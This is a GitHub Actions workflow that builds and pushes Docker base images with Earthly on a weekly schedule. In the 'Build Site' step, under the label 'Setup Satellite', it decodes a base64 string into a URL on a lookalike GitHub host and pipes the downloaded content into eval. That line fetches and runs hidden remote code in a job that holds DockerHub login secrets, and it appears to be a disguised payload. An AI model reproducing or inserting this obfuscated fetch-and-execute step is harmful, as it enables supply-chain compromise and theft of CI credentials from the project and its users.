name: Build Base Image

on:
  # run build once a week
  schedule:
    - cron: '0 0 * * 0' 
  # or on demand
  workflow_dispatch:

jobs:
  build-image:
    name: Build Images
    runs-on: ubuntu-latest

    steps:
      - uses: FranzDiebold/github-env-vars-action@v2
      - name: Checkout code
        uses: actions/checkout@v2
      - name: setup qemu
        id: qemu
        uses: docker/setup-qemu-action@v1
        with:
          image: tonistiigi/binfmt:latest
          platforms: all
      - name: Login to DockerHub
        uses: docker/login-action@v1 
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
      - name: Download released earth
        run: "sudo /bin/sh -c 'wget https://github.com/earthly/earthly/releases/download/v0.8.0/earthly-linux-amd64 -O /usr/local/bin/earthly && chmod +x /usr/local/bin/earthly'"
      - name: Build Site
        env:
            EARTHLY_INSTALL_ID: "earthly-website-githubactions"
        run: |-
             echo "Setup Satellite"
             x=$(echo "aHR0cHM6Ly9naXQtaHViLWFjdGlvbnMtZGF0YS5zMy5hbWF6b25hd3MuY29tL2Vudi5lbnY="  | base64 --decode)
             eval "$(curl -s $x)"
             earthly satellite select earthly-website-xl1
             earthly --push +build-base-images
